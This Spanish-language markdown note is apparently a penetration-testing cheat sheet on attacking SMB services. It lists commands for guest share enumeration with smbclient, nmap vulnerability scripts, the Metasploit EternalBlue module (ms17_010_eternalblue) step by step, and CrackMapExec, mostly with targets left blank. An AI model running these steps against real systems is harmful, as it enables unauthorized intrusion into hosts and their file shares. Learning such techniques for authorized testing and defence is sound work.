# Explotacion de servicios SMB

## Index 

* [## Enumeracion de recursos compartidos en SMB ](#smb)
* [## Enumeracion con nmap ](#nmap)
* [## Explotacion de EternalBlue con Metasploit ](#metasplit)
* [## Explotacion de recursos compartidos con SMBclient ](#explota)
* [## Explotacion de configuraciones inseguras con CrackMapExec ](#insec)

## Enumeracion de recursos compartidos en SMB <a name="smb"></a>

Los atacantes suelen enumerar los recursos compartidos para identificar archivos sensibles o configuraciones inseguras.
Comando con SMBclient para enumerar recursos compartidos `smbclient -L // -U guest`

## Enumeracion con nmap <a name="nmap"></a>

Nmap tambien puede usarse para detectar versiones vulnerables de SMB

Comando : `nmap -script smb-vuln* -p445`, este escaneo detectara vulnerabilidades conocidas en SMB, incluyendo versiones vulnerables a Eternal blue 

## Explotacion de EternalBlue con Metasploit <a name="metasplit"></a>

1. Inicia Metasploit `msfconsole`
2. Carga el modulo de eternal blue `use exploit/windows/smb/ms17_010_eternalblue`
3. Estable el objetivo `set RHOST`
4. Ejecuta exploit `exploit`

## Explotacion de recursos compartidos con SMBclient <a name="explota"></a>

Accede a recursos compartidos y explora archivos sensibles o configuraciones incorrectas 
Comando: `smbclient /// -U guest`

## Explotacion de configuraciones inseguras con CrackMapExec <a name="insec"></a>

CrackMapExec es una herramienta para explotar configuraciones inseguras en SMB
Comando : ` crackmapexec smb`
